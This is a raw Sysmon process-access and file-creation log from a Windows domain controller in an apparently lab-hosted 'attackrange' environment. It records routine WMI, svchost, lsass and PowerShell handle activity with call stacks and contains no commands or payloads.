15:59:25.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024543Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024542Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024541Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024540Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024539Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024538Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024537Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024536Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024535Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024534Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024533Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024532Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024531Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024807Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.616{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024806Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.616{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024805Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.569{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024804Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.569{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000024803Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.538{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0u1jrlox.nyt.ps12021-01-20 15:59:26.538 10341000x800000000000000024802Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.522{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024801Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.475{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-535E-6008-5206-00000000A301}6932C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024800Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.475{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535E-6008-5206-00000000A301}6932C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024799Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.475{7901BC46-535E-6008-5206-00000000A301}69324120C:\Windows\system32\conhost.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024798Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.460{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-535E-6008-5206-00000000A301}6932C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024797Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.460{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 